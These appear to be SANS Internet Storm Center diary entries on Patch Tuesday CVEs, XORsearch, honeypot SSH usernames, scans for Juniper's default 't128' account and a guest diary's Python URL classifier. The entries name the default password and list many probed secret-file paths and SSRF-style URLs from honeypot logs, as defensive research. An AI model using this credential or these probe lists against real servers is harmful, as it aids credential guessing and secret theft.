Windows Secure Channel Elevation of Privilege Vulnerability
%%cve:2025-26649%% No No - - Important 7.0 6.1
%%cve:2025-27492%% No No - - Important 7.0 6.1
Windows Security Zone Mapping Security Feature Bypass Vulnerability
%%cve:2025-27737%% No No - - Important 8.6 7.5
Windows Shell Remote Code Execution Vulnerability
%%cve:2025-27729%% No No - - Important 7.8 6.8
Windows Standards-Based Storage Management Service Denial of Service Vulnerability
%%cve:2025-26680%% No No - - Important 7.5 6.5
%%cve:2025-27470%% No No - - Important 7.5 6.5
%%cve:2025-21174%% No No - - Important 7.5 6.5
%%cve:2025-26652%% No No - - Important 7.5 6.5
%%cve:2025-27485%% No No - - Important 7.5 6.5
%%cve:2025-27486%% No No - - Important 7.5 6.5
Windows Subsystem for Linux Elevation of Privilege Vulnerability
%%cve:2025-26675%% No No - - Important 7.8 6.8
Windows TCP/IP Remote Code Execution Vulnerability
%%cve:2025-26686%% No No - - Critical 7.5 6.5
Windows Telephony Service Remote Code Execution Vulnerability
%%cve:2025-27477%% No No - - Important 8.8 7.7
%%cve:2025-21205%% No No - - Important 8.8 7.7
%%cve:2025-21221%% No No - - Important 8.8 7.7
%%cve:2025-21222%% No No - - Important 8.8 7.7
%%cve:2025-27481%% No No - - Important 8.8 7.7
Windows USB Print Driver Elevation of Privilege Vulnerability
%%cve:2025-26639%% No No - - Important 7.8 6.8
Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability
%%cve:2025-27484%% No No - - Important 7.5 6.5
Windows Update Stack Elevation of Privilege Vulnerability
%%cve:2025-27475%% No No - - Important 7.0 6.1
Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability
%%cve:2025-27735%% No No - - Important 6.0 5.2
Windows upnphost.dll Elevation of Privilege Vulnerability
%%cve:2025-26665%% No No - - Important 7.0 6.1

--

Renato Marinho
LinkedIn|Twitter

 

0 Comments

Published: 2025-04-07

XORsearch: Searching With Regexes

Xavier asked me a question from one of his FOR610 students: "how can you perform a regex search with XORsearch"?

XORsearch is a tool like grep but it performs a brute-force attack on the input file, trying out different encodings like XOR.

You can give it a string to search for, but not a regular expression.

There is a work around however: let XORsearch extract all possible strings, and then use a regular expression to grep through the results.

Here is an example with a Cobalt Strike beacon:

Option -S instructs XORsearch to extract all ASCII strings, and re-search.py is used with its built-in regular expression for IPv4 address.

We obtain one address, that we then use directly with XORsearch:

This gives us more information: we see a URL path, and we know the encoding is XOR, and the key is 0x0D.

With option -n, we can look for even more info surrounding that IPv4 address:

There also a method using YARA rules, but for that I need to publish a Python version of xorsearch first. More details in an upcoming diary entry.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

0 Comments

Published: 2025-04-06

New SSH Username Report

As you may have noticed by some of my recent diaries, I have spent a bit more time on ssh and telnet credentials. These credentials are collected by Cowrie, the amazing full features SSH and Telnet honeypot maintained by Michel Oosterhof. Cowrie is installed as a component if you install our DShield honeypot.

One very simple way to find "interesting" things is to look at what is new. To allow you to explore yourself, I added an "SSH/Telnet Username Summary". The report lists all usernames we observed in the last 30 days, and if we saw them at least five times. These numbers may, of course, change. There is also a simple JSON formatted report you may download to play with: https://isc.sans.edu/sshallusernames.json

So let's take a quick look at "what's new":

  • ysoperator: Looks familiar, but can't remember where I saw it. Google is of little help here.
  • uery: Maybe a typo, and should be "query"?
  • tamatiek: Appears to be a Japanese name?
  • shughes: I guess this is for "S Hughes". Many systems use the first initial and last name as username. There are a few more like that that I will skip here
  • dbmasteruser: Something a bit more interesting. Likely supposed to refer to a database administrator account.

And there is one I think was funny: /usr/share/wordlists/logins.txt . Yes, the filename and path. I suspect the user didn't know yet how to run the brute force script and passed the filename instead of the username. There are a few I consider typos: "atascientist" (I suspect "datascientist"), "ackupadmin" (backupadmin?). Could also be a tool that swallows the first letter of the username if the username is not provided correctly.

I am working on a similar list of passwords. But there are a lot more different passwords than usernames making that a bit more challenging. Let me know if there are any additional details I should add.

Lesson: Attackers make mistakes too, and there are no real "safe" usernames. 

List of recently seen "new" usernames

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2025-04-02

Surge in Scans for Juniper "t128" Default User

Last week, I noticed a surge in scans for the username "t128". This username, accompanied by the password "128tRoutes," is a well-known default account for Juniper's Session Smart Networking Platform (or "SSR" for "Session Smart Routing"). The username and password are a bit "odd". Juniper acquired a company called "128 Technologies" a few years ago, and with this acquisition, integrated SSR into its product portfolio. But much of the product, including default usernames and passwords, remained unchanged. The documentation, including the default username and passwords, is still at 128technology.com  [1].

The scans we observed lasted from March 23rd to 28th. About 3000 source IPs took part in these scans. Many of the sources taking part in the scan are well known for scanning SSH and are likely part of some "Mirai Type" botnet.

Double-check that you are not using the default password for the root or t128 account. Some older user questions suggest that changing the password is not always effective, or the process is not obvious [2]. 

 

graph showing an increase in scans for the t128 account and default password for end of March

[1] https://docs.128technology.com/docs/cc_fips_access_mgmt/
[2] https://community.juniper.net/discussion/admin-and-t128-users-remain-with-default-passwords-after-onboarding-to-conductor-thoughts

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

1 Comments

Published: 2025-04-02

Exploring Statistical Measures to Predict URLs as Legitimate or Intrusive [Guest Diary]

[This is a Guest Diary by Gregory Weber, an ISC intern as part of the SANS.edu BACS program]

For the last 5 months, as part of my BACS internship with SANS, I have monitored two deployments of a DShield Sensor, sometimes referred to as a honeypot. The DShield sensor offers multiple attack surfaces including Telnet and SSH ports but one of its features is a public-facing web server. One of my deployments sits on a cloud instance and this web server sees a large volume of traffic, making it ideal for research on web server attacks.

Many of the web "attacks" I have observed are rapid-fire URL submissions to the WordPress server meant to see if the server will reveal any of its "secrets" like encryption key files, user accounts, or back end logic. Moreover, the submissions are automated and often what appear to be "just passing by and saw you were a web server so thought I would try" type opportunity checks (like a crook pulling door handles in a parking lot to see if anything happens to open for a quick snag). As a community, information security professionals are probably more concerned with targeted attacks to their organizations but crimes of opportunity can be just as damaging -particularly where they reveal the existence of weaknesses to an attack group that may otherwise never bother with that specific organization.

While tending to my daily analysis, I have also been progressing through SEC595 "Applied Data Science and AI/Machine Learning for Cybersecurity Professionals". I enjoy the challenges of coding and I am fascinated with data driven decisions; particularly where carefully thought-out data science logic can help us separate out those things which our human problem-solving skills and expertise need to focus on versus the thousands of things they do not.

As such, I decided to experiment with applying frequency analysis to the Dshield data I had been collecting just to see whether I could write a simple classification program. I chose to focus on the web honeypot URL data to write a program that parses a URL and accurately determines if the URL represents an intrusive type request or what I call a legitimate request. The experiment differs from many other categorical URL classification programs in that those classifiers are often focused on user initiated connections to external sites. In other words, those programs attempt to determine if a URL a user is clicking/typing is malicious based on statistical metrics such as "known bad" IP address lists or name lists. This program is focused on those URLs that may get submitted to a public facing web server in attempts to scope the server's logic, perform command injection, perform server side request forgeries, or retrieve restricted files from a database or file directory that trusts the server.

Why this project???

I should state up front I am aware this is not groundbreaking: WAFs and lots of other goodies organizations purchase use sophisticated methods to tag-team this task as part of a layered defense. Anyone reading this is no doubt aware Web Application Firewalls are designed to perform many metrics to intercept malicious web requests before they can ever reach the server. And a strong defense-in-depth strategy for any public facing server will harden the server with input validation logic, use of parameterized queries, and similar to strengthen it from anything that makes it past the firewall as well as ensure things like permission restriction for the server account and removal of any files from its directories not needed to perform its functions in the spirit of least-privilege design. However, web servers are still the most commonly attacked and this would not be so if the attacks did not work some of the time.... and there is another important consideration...

Information security in 2025 has continued to shift away from the idea that keeping attackers "out" is the strongest strategy. Keeping attackers out is still the most ideal goal, but the community has recognized that with so many applications, so many patches, so many systems that need to talk to each other, so many coding libraries, and so many, ..on-and-on, that no organization bats 1,000 at keeping attackers out. Applying statistical data science to an already robustly protected web application gives security monitors another tool: consider a yet undiscovered vulnerability or exposed resource that allows the maliciously crafted URL to work successfully. The WAF does not intercept it and the server processes the request for a 200 response, making it much more likely no one will be aware the attack was successful. A statistical based approach that alerts the SOC based on the probability a URL is crafted to be intrusive does not rely on a log of 400 level response or a WAF rule, it simply alerts someone to put eyes on the request based on statistical metrics.  Security tools rely on rules – rules that engineers update as new exploits are discovered.  Until the new rule is written, the tool does not alert anyone because it does not “know” that it should.  Statistical models can alert based on probability and these models can discern abnormal based on features – a topic that is extremely fascinating and promising for blue team.  

For me, this was about a learning experience and attempt to experiment with DShield data while simultaneously gaining more experience with malicious web queries; it is not sophisticated but offers an example of how these models function. 

Approach

For continued learning, I want to apply various descriptive statistical models, probability theory, and eventually more sophisticated machine learning models to URL suffixes to categorize them as either legitimate or intrusion-oriented using techniques practiced in SEC595. This diary focuses on the simplest approach using frequency analysis as the basis to classify the URL. Frequency is simply the idea of how often something occurs in a set of data (in this case URL suffixes).

It is a fair question to ask how and why something like this would be expected to work. Leaving out the "how" for a moment, the why would it work question comes down to the entire concept of attacking a machine that accepts user input. The attacks highlighted by OWASP share the commonality that they use malformed input to trick an application. Therefore, it seemed possible to me that if I could build a dictionary of words or phrases that are 'malformed' along with a separate dictionary of words/phrases common to everyday URL submissions, I could take any URL, parse it into its pieces, and then compare how many of those pieces appear in the "normal" dictionary versus how many appear in the "malformed" dictionary. Whichever dictionary had more pieces of the URL would determine whether the URL was likely an attack. Although I don't explore it in this experiment, it would be relatively easy to move beyond a simple majority vote and set a different threshold (say 70/30) or whatever seems to work best.

Below I will walk through the specific steps and provide the code used (feedback is welcome). The program specifically focuses on the content contained after "www.website.tld"

Overview of Steps for Frequency Classification

1.    Obtain URL requests generally deemed malicious (DShield 404 logs). 
2.    Obtain URL requests that are legitimate to normal website traversal 
3.    Isolate the specific suffixes and create a dictionary of words/phrases present in the URLs, one based on the legitimate URLs and the other on known malicious URLs. 
4.    Create frequency function that classifies a random URL based on the comparison of parts in each dictionary. 
5.    See if the accuracy has revealed anything useful. 
6.    Refine and enhance with other more sophisticated machine learning methods as time allows in the future 

Steps 1 and 2: Obtaining the Data

To obtain malicious web requests, I utilized a DShield sensor deployed as part of BACS 4499 that contains a web server and logs URL requests to the server. Since this device is specifically deployed to be attacked and, indeed, has been "attacked" throughout the last 6 months, my experiment makes the assumption all of these URL requests except as noted below are attempts to expose restricted access rather than legitimate web requests. The exception will be any "/" only requests as those represent the root of the web server and are common to all top page-level requests.

The more difficult challenge was to obtain URLs of legitimate website interaction. The challenge is two-fold:
1.    Locating a source of aggregate data like this without visiting random websites to build what is likely only a very narrow list 
2.    Websites are mapped specific to an organization, there are no 'rules' to how this is done though there are fairly conventional URL structures based use of LAMP stacks and typical application programming. 

To overcome this obstacle, I decided to use a dataset generated as part of a demonstration on how to use Python code to map websites. The code specifically crawled various, legitimate websites creating URL links of full depth into the sites. Again, due to wide variety of site structures prevalent across the internet, this data does not provide a complete training model (neither does the DShield intrusive URL data) but it did provide a great starting point to begin experimenting. The dataset of "legit" URLs is courtesy of Elias Dabbas published on the Kaggle.com repository.

The URLs were then separated into two folders of csv files containing links - one legit and one intrusion-oriented. For both folders, some of the data will be left unused until it is time to test the function accuracy on known data.  The first 5 of each data file type is shown below. The reader will observe there are more "Intrusive" files than "Legit" however the legitimate URL data files are significantly larger (they contain more URLs each).

print(f'Num intrusive URL files: {len(intrusive_files)}\tNum of legit URL files: {len(legit_files)}')
print(intrusive_files[0:5], '\n', legit_files[0:5])       

Num intrusive URL files: 25     Num of legit URL files: 6
['./Attack Observations/Project/Intrusive/404reports_2025-01-25.csv', './Attack Observations/Project/Intrusive/404reports_2025-01-30.csv', './Attack Observations/Project/Intrusive/404reports_2025-02-13.csv', './Attack Observations/Project/Intrusive/404reports_2025-02-14.csv', './Attack Observations/Project/Intrusive/404reports_2025-02-15.csv'] 
 ['./Attack Observations/Project/Legit/sitemap_2022_12_30_google_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_03_searchenginejournal_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_08_foreignpolicy_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_11_apple_com_cleaned.csv', './Attack Observations/Project/Legit/sitemap_2023_01_31_washingtonpost_com_cleaned.csv']

Step 3 (part 1): Isolate the specific suffixes

I reviewed hundreds of the URLs from Dshield sensor throughout my internship as part of my daily analysis.  This experiment relies on creating a useful list of words, phrases, or other structural commonalities in intrusively sent web requests as well as a useful list of legit web requests. I have very little experience setting up public-facing web applications or websites meant for user interaction. To keep things manageable, I decided to focus on two keys when parsing the URLs: specific words/phrases contained in the URL and accounting for the presence of either a period '.' or a dash "-" in the suffix. There is certainly room for improvement but I have found many malformed URLs contain periods and dashes as a way to trip logic. There are of course other characters used for SQLi and similar but again, I kept it simple to start.

The code block that follows defines a function "parse_url_words" taking a file of URLs, iterating on it using a regular expression to extract parts of the suffix, and returning a Python list of individual words/phrases parsed from the regex.

def parse_url_words(url = 'https://www.coffee4all.com/subpage1/subpage2') :
    #Returns a list of words/phrases and periods in URL link
    import re
    
    #regex block to account for fqdn as well as truncated records containing only '/sub1/sub2/etc.'
    extract_domain = re.match('https?://.{,3}\..+?\..+?/', url)
    if extract_domain : 
        regex = re.compile(f'(?:{extract_domain.group()}|/)(.*?)$')
    else : 
        regex = re.compile('/(.*?)$')
    url_suffix = re.findall(regex, url)    
    
    #Error check and account for lines that have no returned value
    if url_suffix == [] or url_suffix == [''] : return ([])
    if '/' in url_suffix[0] :
        url_word_list = url_suffix[0].split('/')
    else :
        url_word_list = url_suffix      
    
    #Extract words and break phrases into smaller parts by splitting on '-' or '.'
    additionals = []
    period = False
    dash = False
    for phrase in url_word_list :
        if "." in phrase : 
            additionals += phrase.split('.')
            period = True 
        if "-" in phrase : 
            additionals += phrase.split('-')
            dash = True
    if period : 
        url_word_list.append('.')
        url_word_list += additionals
    if dash : 
        url_word_list.append('-')
        url_word_list += additionals
    url_word_list = list(set(url_word_list))
    if '' in url_word_list : url_word_list.remove('')
           
    return(url_word_list)
#Test the function
test_legit_URL = parse_url_words('https://www.coffee4me.plzzz/top/order/pay/to-us')
print(len(test_legit_URL),'\n',test_legit_URL)

 ['us', '-', 'pay', 'order', 'top', 'to', 'to-us']

Step 3 (part 2): Build Dictionaries of Words

Using the parse_url_words function, I then looped on both directories to build datasets called "legit" and "intrusive". The reader may observe the code block below uses a Counter() dictionary. Although the data sources were not extremely large (a potential weakness in the experiment discussed in further detail in conclusion), it was apparent that using Python lists would result in large numbers of repeats. For efficiency of memory and time, the lists are effectively reduced to unique values automatically by using a counter dictionary. It would have been possible to accomplish this using Python sets (as is performed when parsing an individual URL) however I like the added functionality and speed a dictionary provides for larger data sets. A counter dictionary specifically allowed me to store the frequency of each word/phrase in the values (since the words/phrases themsevles are the keys). Although my this diary of frequency classification does not make use of the counter's added functionality, there is no doubt when I build on the experiment later, having that added functionality will be nice.

# Legit Words from first 4 files (preserving two for testing)
from collections import Counter
legit = Counter()
for file in legit_files[0:4] :
    with open(file, 'rb') as fh:
        for url_line in fh : #Iterates on lines as many sample datasets are large enough to consume memory
            content = url_line.decode().lower().strip()
            legit.update(parse_url_words(content))

# Intrusive Words from first 18 files (preserving 7 for testing)
intrusive = Counter()
for file in intrusive_files[0:20] :
    with open(file, 'rb') as fh:
        for url_line in fh : #Iterates on lines as many sample datasets are large enough to consume memory
            content = url_line.decode().lower().strip()
            intrusive.update(parse_url_words(content))
#Display 100 words contained in each of the lists
print(f'Total number of words in Legit: {len(legit)}\n')
print(list(legit.keys())[100:200], '\n')
print(f'Total number of word in Intrusive: {len(intrusive)}\n')
print(list(intrusive.keys())[100:200])    

Total number of words in Legit: 490321  [TRUNCATED]

['zh_hk', 'signup_complete', 'signup_complete.html,', '.', 'html,', 'mediatools', 'get', 'develop', 'develop.html,', 'engage.html,', 'engage', 'gather.html,', 'gather', 'publish', 'publish.html,', 'resources.html,', 'resources', 'search', 'search.html,', 'visualize', 'visualize.html,', 'videoqualityreport', 'm', 'faq.html,', 'faq', 'faster', 'web.html,', 'faster-web', 'faster-web.html,', 'how.html,', 'how', 'methodology', 'methodology.html,', 'youtube', 'youtube.html,', 'cardboard', 'apps', 'android', 'buy', 'buy-cardboard-android', 'ios', 'buy-cardboard-ios', 'buy-cardboard', 'developers', 'download', 'get-cardboard', 'jump', 'manufacturers', 'product-safety', 'safety', 'product', 'sundance', 'viewerprofilegenerator', 'es_mx', 'fr_ca', 'pt_br', 'pt_pt', 'plastic', 'expire.html,', 'expire', 'journalismfellowship', 'thankyou', 'thankyou.html,', 'noto', 'feedback', 'cjk', 'help', 'emoji', 'activities', 'activities.html,', 'nature.html,', 'animals-nature', 'animals-nature.html,', 'animals', 'flags.html,', 'flags', 'food-drink.html,', 'drink.html,', 'food-drink', 'food', 'objects.html,', 'objects', 'smileys', 'smileys-people', 'smileys-people.html,', 'people.html,', 'symbols', 'symbols.html,', 'travel-places.html,', 'travel', 'places.html,', 'travel-places', 'guidelines', 'install', 'updates', 'projectlink', 'google2ba69e9df6ccb5fb.html,', 'google2ba69e9df6ccb5fb', 'spectrumdatabase', 'business'] 

Total number of word in Intrusive: 12608 [TRUNCATED]

['config.ini', 'hnap1', 'secrets', 'secrets.json', 'wp-config.php', 'products', 'view.php', 'src', 'settings.js', 'main.js', 'main', 'server', 'server-info', 'bundleconfig.json', 'bundleconfig', 'wp-content', 'debug.log', 'content', 'phpversion', 'phpversion.php', 'secrets.yml', 'services.php', 'debug.php', 'production.json', 'production', 'php~', 'config.php~', 'wp-config.php~', '.env.local', 'local', 'broadcasting.php', 'broadcasting', 'settings.json', 'server.js', 'config.env', 'env.json', 'file', 'status', 'server-status', 'keys.js', 'keys', 'application.properties', 'properties', 'test1.php', 'test1', 'mail.php', 'mail', 'environment', 'environment.ts', 'ts', 'acl', 'acl.config.php', 'library', 'global.php', 'autoload', 'global', 'phpconf.php', 'phpconf', 'session.php', 'session', '.env.bak', 'bak', 'wp-config.org', 'config.org', 'org', 'database.yml', 'database', 'config.json', 'default.json', 'index.js', 'bootstrap', 'resources', 'bootstrap.yml', 'test.json', 'dev', 'php.php', 'php_info.php', 'php_info', 'test2.php', 'test2', 'database.php', '.env.dev', 'tmp', 'index.html', 'server.php', 'test.config.php', 'front', 'queue.php', 'queue', 'config.properties', 'aws.json', 'config.bak', 'wp-config.bak', 'crm', 'xampp', 'users', 'prod', 'admins', 'infos.php', 'infos']

Step 4 Using Frequency to Categorize a URL as Intrusive or Legit

The reader may question whether the significant size difference in the two dictionaries is going to cause skewing of results. This is fair and something ideally addressed by finding more sources of malformed URLs (which is something I will do as I move forward). However, I would expect the malformed URL dictionary to be much smaller: there are likely many more variations of legitimate URLs than intrusive (an assumption only at this point), and the source of the intrusive URLs at this point is the DShield, which logs reveal receives a high number of repeated attempts using lists of URLs (much like lists of common passwords). 
Frequency is simply a measure of how often something occurs in a set of data. To classify a random URL as either Intrusive or Legit by frequency means determining whether its word and phrase structure, when parsed into a list, has more items that appear in the "Legit" dataset, or more items that appear in the "Intrusive" dataset.

The code block that follows defines a function called "url_word_count" that passes an individual URL to the URL parsing function above and returns a tuple count of the number of words/phrases present in the legit dictionary as well as the intrusive dictionary.

The function called "frequency_classifier" will receive a full file of URLs, make use of the url_word_count and then classify each URL as legitimate or intrusive. It will then display the results.

def url_word_count(url='https://www.coffee4all.com/subpage1/subpage2') :
    all_words = parse_url_words(url)
    url_legit_words = [word for word in all_words if word in legit.keys()]
    url_intrusive_words = [word for word in all_words if word in intrusive.keys()]
    return(len(url_legit_words), len(url_intrusive_words))

def frequency_classifier(filename) :
    legit_urls = 0
    intrusive_urls = 0
    total = 0
    with open(filename, 'rb') as fh:
        for url_line in fh :
            content = url_line.decode().lower().strip()
            if content == '/' : continue 
            legit, intrusive = url_word_count(content)
            if legit >= intrusive :
                legit_urls += 1
            else :
                intrusive_urls += 1
            total += 1
    print(f'File Name: {filename}')
    print(f'Total URLs in the file: {total}')    
    print(f'Predicted Legit URLs: {legit_urls}\tPercentage: {legit_urls/total:.2%}')
    print(f'Predicted Intrusive URLs: {intrusive_urls}\tPercent Intrusive: {intrusive_urls/total:.2%}\n')    

As a reminder for clarity, the test data was set aside and not used to generate the legit/intrusive datasets, but the data comes from the same sources so it is known which category the frequency classifier "should" come up with. This provides a way to check the classifier against known data.

The code blocks below run the function on the legit and intrusive test data files, listing the percentage of each the classifier found. An ideal score would be 100% of URLs predicted Legit for the legitimate URL test data and similar for the intrusive URL test data.

# Test data for Legit files are items 5-6

print("Test data results for Legitimate Files\n",50*'-')
for file in legit_files[len(legit_files)-2:] :
    frequency_classifier(file)

print("\nTest data results for Intrusive Files\n",50*'-')
for file in intrusive_files[len(intrusive_files)-5:] :
    frequency_classifier(file)
Test data results for Legitimate Files
 --------------------------------------------------
File Name: ./Attack Observations/Project/Legit/sitemap_2023_01_31_washingtonpost_com_cleaned.csv
Total URLs in the file: 847794
Predicted Legit URLs: 847792    Percentage: 100.00%
Predicted Intrusive URLs: 2     Percent Intrusive: 0.00%

File Name: ./Attack Observations/Project/Legit/sitemap_2023_03_16_economist_com_cleaned.csv
Total URLs in the file: 190424
Predicted Legit URLs: 190424    Percentage: 100.00%
Predicted Intrusive URLs: 0     Percent Intrusive: 0.00%

Test data results for Intrusive Files
 --------------------------------------------------
File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-15.csv
Total URLs in the file: 591
Predicted Legit URLs: 128       Percentage: 21.66%
Predicted Intrusive URLs: 463   Percent Intrusive: 78.34%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-16.csv
Total URLs in the file: 137
Predicted Legit URLs: 10        Percentage: 7.30%
Predicted Intrusive URLs: 127   Percent Intrusive: 92.70%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-17.csv
Total URLs in the file: 579
Predicted Legit URLs: 2 Percentage: 0.35%
Predicted Intrusive URLs: 577   Percent Intrusive: 99.65%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-18.csv
Total URLs in the file: 1366
Predicted Legit URLs: 2 Percentage: 0.15%
Predicted Intrusive URLs: 1364  Percent Intrusive: 99.85%

File Name: ./Attack Observations/Project/Intrusive/404reports_2025-03-19.csv
Total URLs in the file: 348
Predicted Legit URLs: 2 Percentage: 0.57%
Predicted Intrusive URLs: 346   Percent Intrusive: 99.43%

Analysis of Test Results

The test runs showed that a simple frequency comparison of words or phrases contained in the suffix of legitimate URLs seemed to accurately predict a legitimate URL was in fact legitimate. However, the intrusive tests proved much less accurate. Specifically the URL links contained in web honeypot logs on March 15 and March 16 contained significant classification errors.

I performed an in-depth analysis of the files in question, utilizing a code block to print out those URLs the classifier had labelled as legitimate even though they were in the known intrusive test set. I was rather put off to discover a few of these URLs made it past the frequency classifier:

URL: http://api.ipify.org/      LEGIT  number 108
URL: /credentials       LEGIT  number 109
URL: /robots.txt        LEGIT  number 110
URL: /ping_pong.php     LEGIT  number 111
URL: /robots.txt        LEGIT  number 112
URL: http://api.ipify.org/      LEGIT  number 113
URL: http://the-cat.click/validate      LEGIT  number 114

This means that a URL like /robots.txt is was not in the training data that built the word dictionaries and highlights the potential for incomplete data when using only one source (in this case DShield logs). A larger disappointment to me was the presence of other URLs within the URL suffix. These represent the opportunity to perform server side request forgeries which can be used to reveal restricted information, have the server request something from a 3rd party that trusts it on behalf of the attacker, or even reveal instance metadata (in the case of a cloud based server or container).

Final Thoughts

The frequency classifier performed well on for a first time run by an admitted rookie to intrusion analysis. Though simple, it proved to be useful and different way for me to gain experience as part of my internship program and this is only the beginning. There are several weaknesses I need to address, among them: the extremely broad set of legitimate URL structures out there, my simplistic regular expression that parses the URLs, and the statistical model used. I plan to improve upon the experiment, attempting more sophisticated models as I gain experience in both intrusion analysis and machine learning techniques. 

As a final note, I would like to acknowledge the work of SANS Instructor David Hoelzer in authoring the material for SEC595. It is this work that provided me the idea and starting point to attempt techniques from those class labs to apply to my DShield we

[1] https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/
[2] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 Comments